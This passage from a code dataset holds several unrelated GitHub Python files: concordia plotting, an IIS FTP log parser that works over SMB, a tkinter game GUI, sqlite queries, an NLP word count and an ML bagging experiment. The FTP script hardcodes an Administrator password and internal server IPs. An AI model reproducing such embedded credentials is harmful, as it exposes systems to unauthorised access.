ell_obj[i].height,\n # fc='none', ec='red', lw=0.5, zorder=100)\n # ax.add_patch(rec)\n # ------------------\n\n # Get slope and y-int of line projected through ellipse major axis.\n\n # ---- old appraoch -----\n # WARNING !! This doesn't always work as expected !!\n # e_angle = ell_obj[i].get_angle() * np.pi / 180\n # eb = np.tan(e_angle)\n # eb_disp = eb / scale_factor\n # -------\n\n # get ellipse bbox from path:\n # path_xy = ax.transData.inverted().transform(ell_obj[i].get_verts())\n path_xy = ell_obj[i].get_verts()\n ind_xmin = np.argmin(path_xy[:, 0])\n ind_xmax = np.argmax(path_xy[:, 0])\n ind_ymin = np.argmin(path_xy[:, 1])\n ind_ymax = np.argmax(path_xy[:, 1])\n\n xy_xmin = path_xy[ind_xmin, :]\n xy_xmax = path_xy[ind_xmax, :]\n xy_ymin = path_xy[ind_ymin, :]\n xy_ymax = path_xy[ind_ymax, :]\n\n # --- tesing ----\n # for xy in (xy_xmin, xy_xmax, xy_ymin, xy_ymax):\n # xy = ax.transData.inverted().transform(xy)\n # ax.plot(*xy, 'mo', ms=4, zorder=120)\n # -------\n\n # offset along line parralell / orthogonal to ellipse extreme values\n if diagram == 'tw':\n if np.isclose(xy_ymax[0], xy_ymin[0]):\n # eb_disp = 0.\n # no correlation - offset along conc. slope:\n eb_disp = b_disp\n else:\n eb_disp = (xy_ymax[1] - xy_ymin[1]) / (xy_ymax[0] - xy_ymin[0])\n else:\n if np.isclose(xy_xmax[1], xy_xmin[1]):\n # eb_disp = np.inf\n # no correlation - offset along conc. slope:\n eb_disp = b_disp\n else:\n eb_disp = (xy_xmax[1] - xy_xmin[1]) / (xy_xmax[0] - xy_xmin[0])\n\n eb = eb_disp * scale_factor\n ea = y[i] - eb * x[i]\n ea_disp = y_disp - eb_disp * x_disp\n\n # ---- testing -----\n # ax.plot((xmin, xmax), (ea + eb * xmin, ea + eb * xmax),\n # lw=0.5, c='red', ls='-')\n # xmin_disp = ax.get_window_extent().xmin\n # ymin_disp = ax.get_window_extent().ymin\n # xmax_disp = ax.get_window_extent().xmax\n # ymax_disp = ax.get_window_extent().ymax\n # y1 = ea_disp + eb_disp * xmin_disp\n # y2 = ea_disp + eb_disp * xmax_disp\n # x1, y1 = ax.transData.inverted().transform((xmin_disp, y1))\n # x2, y2 = ax.transData.inverted().transform((xmax_disp, y2))\n # ax.plot((x1, x2), (y1, y2), lw=0.5, c='blue', ls='-')\n # -------\n\n # find intercept points b/w conc slope line and bbox defined\n # by x, y min and max points on ellipse (calling get_window_extents\n # doesn't seem to work properly all the time?)\n ints = plotting.box_line_intersection(xy_xmin[0], xy_xmax[0],\n xy_ymin[1], xy_ymax[1], ea_disp, eb_disp)\n\n if ints.size == 0:\n warnings.warn(f'individualised age ellipse label routine failed '\n f'for {t[i]} Ma marker')\n np.array(markers_dict['add_label'])[i] = False\n an.remove()\n continue\n\n # ----- testing ----\n # ax.plot(*ax.transData.inverted().transform(ints[0, :]), 'bo', ms=2, zorder=100)\n # ax.plot(*ax.transData.inverted().transform(ints[1, :]), 'bo', ms=2, zorder=100)\n # dd = ints[0, :] - np.array((x_disp, y_disp))\n # dx = dd[0]\n # dy = dd[1]\n # dist = np.sqrt(dx ** 2 + dy ** 2)\n # -----\n\n # offset text box by this extra amount (data coords)\n d2 = np.sqrt(np.sum((ints[1] - ints[0]) ** 2)) / 2.\n\n dx_disp2 = -np.sqrt(d2 ** 2 / (eb_disp ** 2 + 1.))\n dy_disp2 = eb_disp * dx_disp2\n\n # ---testing---\n # x2, y2 = ax.transData.inverted().transform((x_disp + dx_disp2, y_disp + dy_disp2))\n # ax.plot(x2, y2, 'go', ms=2, zorder=100)\n # ----\n\n dx_disp += dx_disp2\n dy_disp += dy_disp2\n\n # Transform x, y from display coords back to data coords and re-set\n # annotation position.\n # xy = ax.transData.inverted().transform((x_disp, y_disp))\n x_dat, y_dat = ax.transData.inverted().transform((x_disp + dx_disp,\n y_disp + dy_disp))\n an.set_position((x_dat, y_dat))\n\n\n label_annotations.append(an)\n\n if remove_overlaps:\n remove_overlapping_labels(label_annotations)\n\n markers_dict['label_annotations'] = label_annotations\n return markers_dict\n\n\ndef remove_overlapping_labels(an):\n \"\"\"\n Naive routine for removing overlapping concordia labels older than first\n overlap point.\n\n an : array-like\n list of concordia age marker / ellipse label annotations\n \"\"\"\n n = len(an)\n overlap = np.full(n, False)\n\n # Check if annotation bbox fully (?) overlaps axis bbox,\n # and flag if not.\n for i in range(n - 1):\n b1 = an[i].get_window_extent() # in display coords\n b2 = an[i + 1].get_window_extent()\n if b1.overlaps(b2):\n overlap[i + 1] = True\n else:\n overlap[i + 1] = False\n n_overlap = np.sum(overlap == True)\n\n # If overlaps found:\n # 1. If only youngest label overlaps, remove this and keep all others.\n # 2. If n > 5 and only youngest 2 overlap, remove these 2 and keep others.\n # 3. Otherwise remove from oldest down to first overlap.\n if n_overlap > 0:\n if n > 2 and n_overlap == 1 and overlap[0]:\n an[0].remove()\n elif n > 5 and n_overlap == 2 and overlap[0] and overlap[1]:\n an[0].remove()\n an[1].remove()\n else:\n for j in reversed(range(np.argwhere(overlap).min(), n)):\n an[j].remove()\n","repo_name":"timpol/pysoplot","sub_path":"src/pysoplot/concordia.py","file_name":"concordia.py","file_ext":"py","file_size_in_byte":55959,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"}
+{"seq_id":"16529769203","text":"\"\"\" Print each element of the list\"\"\"\npets = ['cat','dog','fish','bird','rabit','neighbor']\n\nfor pet in pets:\n print(pet)\n\n# while loop testing\ni_need_more_money=20\nwhile i_need_more_money < 35:\n print(\"Now I have \",i_need_more_money)\n i_need_more_money += 1\n\n# Write a program that guess a number between 1 to 10\nimport random\ncounter = 0\ntarget_numnber, guess_number=random.randint(1,10),3\n\nwhile target_numnber != guess_number:\n target_numnber, guess_number=random.randint(1,10),3\n print (\"Keep Guesting - \", counter,target_numnber, guess_number)\n counter += 1\n\n","repo_name":"nileshvarshney/python","sub_path":"simple_python/days/Day8.py","file_name":"Day8.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14609641822","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# #### FTP(IIS)のログを解析する\n# ##### IN : IIS(FTP)のログ置き場にSMBで取得、必要情報\n# ##### OUT:\n# \n# https://sinhrks.hatenablog.com/entry/2014/11/21/231534\n\n# ###### 必要ライブラリ\n\n# In[ ]:\n\n\n#get_ipython().system('pip install pysmb')\n\n\n# In[1]:\n\n\nfrom smb.SMBConnection import SMBConnection\nimport platform\nimport pandas as pd\nimport re\nimport io\nimport datetime as dt\nfrom pathlib import Path\n#from tqdm import tqdm\nfrom tqdm.auto import tqdm\nimport typer\n#import os\nimport gc\n\n#import json\nimport pickle\n\n\n# In[2]:\n\n\nglobal order\nglobal logs_head\norder = [\n \"date\",\"time\",\"c-ip\",\"cs-username\",\"s-ip\",\n \"s-port\",\"cs-method\",\"cs-uri-stem\",\"sc-status\",\"sc-win32-status\",\n \"sc-substatus\",\"time-taken\",\"x-session\",\"x-fullpath\"]\nlogs_head = [\n 'c-ip','cs-username','s-ip','s-port',\n 'cs-method','cs-uri-stem','sc-status','sc-win32-status',\n 'sc-substatus','time-taken','x-session','x-fullpath','timestamp']\n\n\nglobal FILE_NUMBER\nFILE_NUMBER = 0\n\n\n# In[3]:\n\n\ndef envset(argLOG_YMD, argYMD):\n global ENV\n global ip_address\n global user\n global password\n global remote_hostname \n global LOG_YMD\n global SHARE_NAME\n global FILE_TO_PATH\n global HOME_PATH\n global OUT_PATH\n global LOG_PATH\n global YMD\n global OUT_FILE\n global picklepath\n global OUT_SUM_FILE\n \n LOG_YMD = argLOG_YMD\n ENV = 'HONBAN' \n #ENV = 'TEST'\n if(ENV == 'TEST'):\n ip_address = '172.30.9.85'\n user = 'Administrator'\n password = 'panic'\n remote_hostname = 'RGSV920'\n else:\n ip_address = '172.30.4.193'\n user = 'Administrator'\n password = 'panic'\n remote_hostname = 'SESV400'\n\n SHARE_NAME = 'd$'\n FILE_TO_PATH = 'Ftp/Logs/2021/'\n FILE_TO_PATH = 'Ftp/Logs/2022/'\n HOME_PATH = '/home/jovyan/'\n OUT_PATH = HOME_PATH + 'datasets/Ftplogs/Output/'\n LOG_PATH = f'{HOME_PATH}datasets/Ftplogs/{remote_hostname}/'\n #YMD = f'%s' % dt.datetime.now().strftime('%Y%m%d')\n YMD = argYMD\n #\n #OUT_FILE = f'{OUT_PATH}Log/{YMD}_{remote_hostname}_{LOG_YMD}_{FILE_NUMBER}_FtpLogs.csv'\n #picklepath = f'{OUT_PATH}Pickle/{YMD}_{remote_hostname}_{LOG_YMD}_{FILE_NUMBER}_FtpLogs.csv.pickle'\n #OUT_SUM_FILE = f'{OUT_PATH}Sumary/{YMD}_{remote_hostname}_{LOG_YMD}_{FILE_NUMBER}_FtpLogsSumary.csv'\n \n print(f'%-20s:{ENV:<15s}' % (\"ENV\"))\n print(f'%-20s:{ip_address:<15s}' % (\"ip_address\"))\n print(f'%-20s:{user:<15s}' % (\"user\"))\n print(f'%-20s:{password:<15s}' % (\"password\"))\n print(f'%-20s:{remote_hostname:<15s}' % (\"remote_hostname\"))\n print(f'%-20s:{SHARE_NAME:<15s}' % (\"SHARE_NAME\"))\n print(f'%-20s:{OUT_PATH:<15s}' % (\"OUT_PATH\"))\n print(f'%-20s:{LOG_PATH:<15s}' % (\"LOG_PATH\"))\n print(f'%-20s:{YMD:<15s}' % (\"YMD\"))\n print(f'%-20s:{LOG_YMD:<15s}' % (\"LOG_YMD\"))\n \n \n\n\n# In[4]:\n\n\ndef filenames(argFILE_NUMBER):\n \n global OUT_FILE\n global picklepath\n global OUT_SUM_FILE\n \n OUT_FILE = f'{OUT_PATH}Log/{YMD}_{remote_hostname}_{LOG_YMD}_{argFILE_NUMBER:02}_FtpLogs.csv'\n picklepath = f'{OUT_PATH}Pickle/{YMD}_{remote_hostname}_{LOG_YMD}_{argFILE_NUMBER:02}_FtpLogs.csv.pickle'\n OUT_SUM_FILE = f'{OUT_PATH}Sumary/{YMD}_{remote_hostname}_{LOG_YMD}_FtpLogsSumary.csv'\n \n print(f'%-20s:{OUT_FILE:<15s}' % (\"OUT_FILE\"))\n print(f'%-20s:{picklepath:<15s}' % (\"picklepath\"))\n print(f'%-20s:{OUT_SUM_FILE:<15s}' % (\"OUT_SUM_FILE\"))\n \n\n\n# In[5]:\n\n\n#\ndef SMBFileList():\n print(\"==================================================\")\n result = False\n conn = SMBConnection(\n user,\n password,\n platform.uname().node,\n remote_hostname,\n domain='WORKGROUP',\n use_ntlm_v2=True)\n result = conn.connect(ip_address, 139)\n print(result)\n return result, conn\n\n\n# In[6]:\n\n\ndef LogRead(filename, arg1):\n #df =pd.DataFrame(columns = order)\n def proc1(lines):\n cnt = 0\n all = len(lines)\n bar_template = \"\"\n for buf in lines:\n cnt+=1\n print(f'\\r{filename:_<10}:{cnt:07}/{all:07} [{cnt/all:.2%}]', end=\"\")\n _line = buf.decode() if arg1 == 1 else buf\n if not re.search('^#', _line):\n (\n date,time,cip,csusername,sip,\n sport,csmethod,csuristem,scstatus,scwin32status,\n scsubstatus,timetaken,xsession,xfullpath\n ) = _line.split(' ')\n df.loc[len(df)] = [\n date,time,cip,csusername,sip,\n sport,csmethod,csuristem,scstatus,scwin32status,\n scsubstatus,timetaken,xsession,xfullpath\n ]\n def proc2(filepath):\n txt = Path(filepath).resolve()\n length = sum(1 for row in open(txt, 'r'))\n chunksize = 5000\n df_t = pd.DataFrame()\n typer.secho(f\"Reading file: {txt}\", fg=\"red\", bold=True)\n #typer.secho(f\"total rows: {length}\", fg=\"green\", bold=True)\n with tqdm(total=length, desc=\"chunks read: \") as bar:\n dsz = length\n for i, chunk in enumerate(pd.read_csv(txt, \n chunksize=chunksize, \n low_memory=False, \n header = None, \n #skiprows=4, \n comment='#',\n sep=' ', \n names=order,\n parse_dates={'timestamp':['date', 'time']}\n )):\n df_t = pd.concat([df_t,chunk])\n bar.update(min(dsz, chunksize))\n dsz -= chunksize\n #typer.secho(\"end of reading chunks...\", fg=typer.colors.BRIGHT_RED, end=\"\")\n #typer.secho(f\"Dataframe length:{len(df_t)}\", fg=\"green\", bold=True)\n return df_t\n if(arg1 == 1):\n # 遅いので使わない\n with io.BytesIO() as file:\n conn.retrieveFile(SHARE_NAME, FILE_TO_PATH + filename, file)\n file.seek(0)\n proc1(file.read().splitlines())\n file.close()\n elif(arg1 == 2):\n # 遅いので使わない\n with open(LOG_PATH + filename) as file:\n proc1(file.read().splitlines())\n file.close()\n elif(arg1 == 3):\n df = proc2(LOG_PATH + filename)\n #df = pd.read_csv(LOG_PATH + filename, header = None, skiprows=4, sep=' ', names=order)\n #return df\n #df_res = pd.concat([df_res, df])\n #print(\"--------------------------- concat \")\n #print(df_res.dtypes)\n else:\n print(2) \n return df\n\n\n# In[7]:\n\n\ndef LogWrite(filename, conn):\n with open(LOG_PATH + filename, 'wb') as file:\n conn.retrieveFile(SHARE_NAME, FILE_TO_PATH + filename, file)\n return 1\n\n\n# In[8]:\n\n\ndef main(argLOG_YMD, argYMD = f'%s' % dt.datetime.now().strftime('%Y%m%d')):\n #print(\"[main]\")\n #LOG_YMD = argLOG_YMD\n envset(argLOG_YMD, argYMD)\n\n #SMBコネクション生成\n #ret, conn = SMBFileList()\n ret ,conn = SMBFileList()\n assert ret == True\n\n #SMBファイル一覧\n #items = []\n items = conn.listPath(\n SHARE_NAME,\n FILE_TO_PATH\n )\n assert len(items) > 0\n \n #FTPログヘッダー\n #order = [\n # \"date\",\"time\",\"c-ip\",\"cs-username\",\"s-ip\",\n # \"s-port\",\"cs-method\",\"cs-uri-stem\",\"sc-status\",\"sc-win32-status\",\n # \"sc-substatus\",\"time-taken\",\"x-session\",\"x-fullpath\"\n #]\n #FTPログDataFrame\n df_res = pd.DataFrame(columns = order)\n df_concat = pd.DataFrame(columns = logs_head)\n #print('<==========>')\n def proc1(argfilename, df_concat, df_res, OUT_FILE):\n df_concat = pd.concat([df_concat, df_res])\n df_concat = df_concat.drop(['date','time'], axis=1) \n #print(OUT_FILE)\n df_concat.index = pd.DatetimeIndex(df_concat.timestamp, name='timestamp')\n df_concat.index = df_concat.index.tz_localize('UTC')\n df_concat.index = df_concat.index.tz_convert('Asia/Tokyo')\n df_concat.timestamp = df_concat.index\n df_concat = df_concat.reset_index(drop=True)\n df_concat.to_csv(OUT_FILE)\n #print(df_concat.info())\n df_concat.to_pickle(picklepath)\n \n #print('<==========>')\n FILE_NUMBER = 0\n FILE_SIZE = 300000000\n FILE_SIZE_CUR = 0\n filenames(FILE_NUMBER)\n \n for item in items:\n #print(f'%s %d bytes' % (item.filename, item.alloc_size)) \n if(not item.isDirectory and \n re.search(LOG_YMD, item.filename)):\n print(f'%s %d bytes' % (item.filename, item.alloc_size)) \n FILE_SIZE_CUR += item.alloc_size\n if(int(FILE_SIZE_CUR/FILE_SIZE) > 0):\n FILE_NUMBER += 1\n FILE_SIZE_CUR = item.alloc_size\n proc1(item.filename, df_concat,df_res, OUT_FILE)\n df_res = df_res[:0]\n df_concat = df_concat[:0]\n gc.collect() \n \n filenames(FILE_NUMBER)\n LogWrite(item.filename, conn)\n df_res = pd.concat([df_res, LogRead(item.filename, 3)])\n \n conn.close()\n \n proc1(item.filename, df_concat,df_res, OUT_FILE)\n df_res = df_res[:0]\n df_concat = df_concat[:0]\n gc.collect() \n return FILE_NUMBER\n #assert 0 > 1\n\n\n# In[9]:\n\n\ndef recov(FILE_NUMBER, argLOG_YMD, argYMD = f'%s' % dt.datetime.now().strftime('%Y%m%d')):\n envset(argLOG_YMD, argYMD)\n filenames(FILE_NUMBER)\n #picklepath = f'{OUT_PATH}{YMD}_{remote_hostname}_{argLOG_YMD}_FtpLogs.csv.pickle'\n with open(picklepath, mode='rb') as fp:\n df_concat = pickle.load(fp)\n \n df_concat['index'] = df_concat.reset_index().index\n print(len(df_concat['x-session'].unique()))\n df_min = df_concat.groupby('x-session', as_index=False)[['index','timestamp']].min()\n df_max = df_concat.groupby('x-session', as_index=False)[['index','timestamp']].max()\n df_min = df_min.rename(columns={'index':'index_min', 'timestamp':'timestamp_min'})\n df_max = df_max.rename(columns={'index':'index_max', 'timestamp':'timestamp_max'})\n df2 = pd.merge(df_min,df_max, on='x-session')\n \n df_group = df_concat.groupby(['x-session','c-ip','s-ip'], as_index=False)[['index']].min()\n #print(df_group.info())\n \n df3 = pd.merge(df2,df_group, on='x-session')\n\n df3['timestamp_diff'] = df3['timestamp_max'] - df3['timestamp_min']\n #df3['timestamp_ts'] = df3['timestamp_diff'].map(lambda x: x.total_seconds())\n df3['timestamp_ts'] = df3['timestamp_diff'].dt.total_seconds() + 1\n #display(df3)\n df3 = df3.drop(['index','timestamp_diff'], axis=1) \n df3['timestamp'] = df3['timestamp_min'].dt.strftime('%Y/%m/%d %H:%M:%S')\n df3['count'] = 1\n #\n print(df3.info())\n ##df3.to_csv(OUT_SUM_FILE)\n return df3\n\n\n# In[10]:\n\n\ndef graph(df3):\n import matplotlib.pyplot as plt\n import collections\n import itertools\n import warnings\n warnings.filterwarnings('ignore')\n # matplotlib日本語化対応\n import japanize_matplotlib\n\n all_from_list = df3['c-ip'].tolist()\n c = collections.Counter(df3['c-ip'].tolist())\n\n tags = pd.Series(c)\n #print(tags)\n df4 = df3.copy()\n df4.set_index('timestamp_min', inplace=True)\n\n df_tag_list = []\n # 先頭10\n top_tag_list = tags.sort_values(ascending=False).index.tolist()\n\n for t in top_tag_list:\n print(t)\n df_tag = df3[df3['c-ip'].apply(lambda x: t in x)]\n df_tag_list.append(df4[['timestamp_ts']].resample('H').sum())\n\n df_tags = pd.concat(df_tag_list, axis=1)\n df_tags.columns = top_tag_list\n\n df_tags[:-1].plot(stacked=True,figsize=(10, 4), title='上位10接続推移')\n plt.legend(title=\"接続先\", bbox_to_anchor=(1.05, 1)) # <-- ココ\n plt.show()\n\n df_tags[:-1].plot.bar(stacked=True, figsize=(10, 4), title='上位10接続推移積み上げ')\n plt.legend(title=\"接続先\", bbox_to_anchor=(1.05, 1)) # <-- ココ\n plt.show()\n\n\n# In[11]:\n\n\n#lp = ['21010','21011','21012'] #20220323\n#lp = ['21013','21022','21022'] #20220325\n#lp = ['21030','21031','21032','21033'] #20220325\n#lp = ['21040','21041','21042','21043'] #20220325\n#lp = ['21050','21051','21052','21053'] #20220325\n#lp = ['21060','21061','21062','21063'] #20220325\n#lp = ['21070','21071','21072','21073'] #20220325\n#lp = ['21080','21081','21082','21083'] #20220328\n#lp = ['21090','21091','21092','21093'] #20220328\n# #lp = ['21100','21101','21102','21103'] #20220328\n# #lp = ['21102'] #20220328-1 ['211020','211021','211022','211023','211024','211025']\n# #lp = ['21102'] #20220328-1 ['211026','211027','211028','211029']\n# #lp = ['21103'] #20220328\n#lp = ['2110'] #20220329\n#lp = ['2111'] #20220329\n#lp = ['2112'] #20220329\n#lp = ['2201'] #20220329\nlp = ['2202'] #20220329\ndf = pd.DataFrame()\nfor l in lp:\n print(f'[IN] YMD: {l}')\n n = main(l)\n for i in range(n):\n df = pd.concat([df, recov(i, l)])\n \n df.to_csv(OUT_SUM_FILE)\n #graph(recov(l, n))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"hasio21gg/jupyterlab-01","sub_path":"notebooks/ftplog/FtplogParse.py","file_name":"FtplogParse.py","file_ext":"py","file_size_in_byte":13282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"32072486981","text":"from cProfile import label\nimport json\nimport collections\n\nimport matplotlib.pyplot as plt\nplt.rcParams['font.family'] = \"MS Gothic\"\n\nwith open(\"neko-sent-splited.json\", \"r\") as f:\n neko_data = json.load(f)\n\nkeyword = \"猫\"\nbase_list = []\nfor sent_data in neko_data:\n # てにをはばっか計算しても意味わからんので、助詞と補助記号を消してみる\n sent_data = filter(lambda x: x[\"pos\"] != \"助詞\" and x[\"pos\"] != \"補助記号\", sent_data)\n # 重複を消すためにいったんset\n _bases = set(list(map(lambda x: x[\"base\"], sent_data)))\n if keyword in _bases:\n base_list += list(_bases)\n\nc = collections.Counter(base_list)\nc.pop(keyword)\ntop10 = c.most_common()[:10]\n\nx = list(map(lambda x: x[0], top10))\ny = list(map(lambda x: x[1], top10))\n\nplt.bar(x, y)\nplt.savefig(\"37.png\")","repo_name":"eteeeeeerminal/practice-nlp100","sub_path":"4/37.py","file_name":"37.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33390253428","text":"from tkinter import * \nfrom tkinter.ttk import *\nfrom tkinter import filedialog\nfrom tkinter import messagebox\n\nfrom PIL import Image\nfrom PIL import ImageTk\n\nfrom config import *\n\nclass Panel(Frame):\n def __init__(self, master, *args, **kw):\n super().__init__(master, *args, **kw)\n \n def hide(self):\n self.grid_forget()\n \n def show(self):\n self.grid()\n\nclass Tile(Panel):\n candies_thumbs = {\n }\n\n def __init__(self, app, master, n, m, i, j, *args, **kwargs):\n super().__init__(master, width=TILE_WIDTH+TILE_BORDER, \n height=TILE_HEIGHT+TILE_BORDER, *args, **kwargs)\n \n self.app = app\n self.n = n\n self.m = m\n self.i = i\n self.j = j\n\n self.candy_thumb = None\n \n self.thumbnail = Canvas(self, bg=\"white\", width=TILE_WIDTH, \n height=TILE_HEIGHT)\n self.thumbnail.pack()\n self.thumbnail.bind('', lambda x: \n self.app.destruct(self.n-i-1, self.m-j-1) ) \n \n def show(self):\n self.thumbnail.pack(padx=TILE_BORDER/2, pady = TILE_BORDER/2)\n \n def hide(self):\n self.configure(bg=\"white\")\n self.thumbnail.pack_forget()\n \n \n def set(self, candy):\n if self.candy_thumb == candy.thumb():\n return True\n \n\n self.candy_thumb = candy.thumb() \n\n offset_width = (TILE_WIDTH - self.candy_thumb.width()) / 2\n offset_height = (TILE_HEIGHT- self.candy_thumb.height()) / 2\n \n self.thumbnail.delete(\"all\")\n self.thumbnail.create_image(offset_width, offset_height, anchor=NW, image=self.candy_thumb) \n self.thumbnail.pack(padx=TILE_BORDER/2, pady = TILE_BORDER/2)\n\n return None\n \nclass MainPanel(Panel):\n def __init__(self, app, master, n, m, *args, **kwargs):\n super().__init__(master, *args, **kwargs)\n self.app = app\n \n self.tiles=[[Tile(app, self, n, m, i, j) for j in range(m)] for i in range(n)]\n self.n=n\n self.m=m\n\n for i in range(n):\n for j in range(m):\n self.tiles[i][j].grid(row=i, column=j)\n self.tiles[i][j].show()\n\n def set(self, i,j, candy):\n self.tiles[self.n-i-1][self.m-j-1].set(candy)\n\nclass HeaderPanel(Panel):\n def __init__(self, app, master, *args, **kwargs):\n super().__init__(master, *args, **kwargs)\n self.app = app\n \n\n self.status = Frame(self)\n self.status.pack()\n\n self.timer = 0\n self.label_timer = Label(self.status)\n self.label_timer.configure(text='Time 0', font=DEFAULT_FONT)\n self.label_timer.grid(row=0, column=0)\n \n self.points = 0\n self.label_points = Label(self.status)\n self.label_points.configure(text='Points 0', font=DEFAULT_FONT)\n self.label_points.grid(row=0, column=1)\n \n self.label_alert = Label(self)\n self.label_alert.configure(text='', font=ALERT_FONT)\n \n self.reset = Frame(self)\n self.label_reset = Label(self)\n \n def reset_(self):\n self.timer = 0\n self.label_timer.configure(text='Time 0', font=DEFAULT_FONT)\n\n self.points = 0\n self.label_points.configure(text='Points 0', font=DEFAULT_FONT)\n self.label_alert.configure(text='')\n\n def set_timer(self, timer, delay):\n '''\n timer - time in ms\n '''\n if self.timer == timer:\n return True\n \n self.label_timer.configure(text='Time %d/%d' % ((timer/1000),(delay/1000)) )\n self.timer = timer\n \n def set_points(self, points, treshold):\n if self.points == points:\n return True\n\n self.label_points.configure(text='Points %d/%d' % (points,treshold))\n self.points = points\n \n\n def end_won(self):\n self.label_alert.configure(text='Congratulations : you win!')\n self.label_alert.pack()\n\n def end_lost(self):\n self.label_alert.configure(text='Game over...')\n self.label_alert.pack()\n\nclass MenuBar(Menu):\n def __init__(self, app, *args, **kwargs):\n super().__init__(app, font=DEFAULT_FONT, *args, **kwargs)\n self.app = app\n\n game_menu = Menu(self, font=DEFAULT_FONT)\n game_menu.add_command(label='New Game - Easy', command=lambda: self.app.new_game(Mod.EASY) )\n game_menu.add_command(label='New Game - Normal', command=lambda: self.app.new_game(Mod.NORMAL) )\n game_menu.add_command(label='New Game - Hard', command=lambda: self.app.new_game(Mod.HARDCORE) )\n self.add_cascade(label='Game', menu=game_menu)\n\n\n\n","repo_name":"severus21/BonBonCrush","sub_path":"marmotte/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"35620397857","text":"#!/usr/bin/env python3\r\n\r\nimport sqlite3\r\n\r\nconn = sqlite3.connect(\"university.db\")\r\n\r\nSTMT_INST_ID_FOR_NAME = \"\"\"\r\n select name\r\n from instructor\r\n where ID =:id\r\n \"\"\"\r\n\r\nSTMT_INST_BUILDING_FOR_NAME = \"\"\"\r\n select building\r\n from instructor, department\r\n where instructor.dept_name = department.dept_name and name = :name\r\n \"\"\"\r\n\r\nSTMT_INST_NAME_BUILDING = \"\"\"\r\n select name, building\r\n from instructor natural join department\r\n \"\"\"\r\n\r\n\r\ndef get_instructor_name(id):\r\n c = conn.execute(STMT_INST_ID_FOR_NAME, {'id': id})\r\n return c.fetchone()\r\n\r\n\r\ndef get_instructor_building(name):\r\n c = conn.execute(STMT_INST_BUILDING_FOR_NAME, {'name': name})\r\n return c.fetchall()\r\n\r\n\r\ndef get_instructor_building_list():\r\n c = conn.execute(STMT_INST_NAME_BUILDING)\r\n return c.fetchall()\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n print(get_instructor_name('22222'))\r\n\r\n print(get_instructor_building('Einstein'))\r\n\r\n print(get_instructor_building_list())\r\n\r\n","repo_name":"kim2-d2/CAS-ADS","sub_path":"M1/Material/access-sql (1).py","file_name":"access-sql (1).py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"33214800800","text":"from sklearn.ensemble import BaggingRegressor\nfrom function_library import *\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom sklearn.tree import DecisionTreeRegressor\nnp.random.seed(272) #L dies after 272 days. RIP L\n\n\nnumber_crossvals=5 #The number of cross validations to perform. 5 to get \"actual\" results, 1 for a simple train-test split\n\n\nfiledata=\"../data/qm7.mat\"\n\nX,R,Z,T,P=read_data(filedata)\ntree_depth=20 #The depth of the tree to perform bagging with\nn_estimators=np.logspace(0,3,7,dtype=int) #The number of trees\n\ntest_err_MSE=np.zeros(len(n_estimators),dtype=\"float\")\ntrain_err_MSE=np.zeros(len(n_estimators),dtype=\"float\")\n\nplt.title(\"Decision Tree Bagging Regressor\")\nplt.xlabel(\"Number of Bootstraps\")\nplt.ylabel(\"MAE (kcal/mol)\")\nplt.xscale(\"log\")\ninput_type=\"reduced\" #noH or reduced\n\nfor index in range(number_crossvals):\n print(\"Forest %d\"%index)\n X_train, R_train, Z_train, T_train, X_test, R_test, Z_test, T_test= convert_dataset(X,R,Z,T,P,index)\n T_train=T_train.ravel()\n T_test=T_test.ravel()\n if input_type==\"reduced\": #Reduced Coulomb matrix\n pass\n if input_type==\"noH\": #No Hydrogen\n testing_indeces=P[index]\n training_indeces=np.delete(P,index,0).ravel()\n X_removed=create_hydrogenfree_coulomb_matrix(X)\n X_removed=reduce_coulomb(X_removed)\n X_train, X_test= createTestTrain(X_removed,training_indeces,testing_indeces)\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train_scaled=scaler.transform(X_train)\n X_test_scaled=scaler.transform(X_test)\n for i,number_estimators in enumerate(n_estimators):\n \"\"\"Make a Bagging Regressor with given number of estimators and tree depths \"\"\"\n regressor=BaggingRegressor(DecisionTreeRegressor(max_depth=tree_depth),n_estimators=number_estimators)\n regressor.fit(X_train_scaled,T_train)\n train_pred=regressor.predict(X_train_scaled)\n test_pred=regressor.predict(X_test_scaled)\n test_err_MSE[i]+=MAE(test_pred,T_test)\n\n train_err_MSE[i]+=MAE(T_train,train_pred)\ntrain_err_MSE/=number_crossvals;\ntest_err_MSE/=number_crossvals;\nplt.plot(n_estimators,test_err_MSE, label=\"test error\")\nplt.plot(n_estimators,train_err_MSE, label=\"train error\")\n\nplt.legend()\nplt.savefig(\"../figures/bagging_2%s.pdf\"%input_type)\nprint(\"MSE: Minimum error at %d estimators with test error %f\"%(n_estimators[np.argmin(test_err_MSE)],np.min(test_err_MSE)));\n\nplt.show()\n\"\"\"\nrun as\npython3 bagging.py\n\"\"\"\n","repo_name":"schraderSimon/FYS-STK","sub_path":"project3/code/bagging.py","file_name":"bagging.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
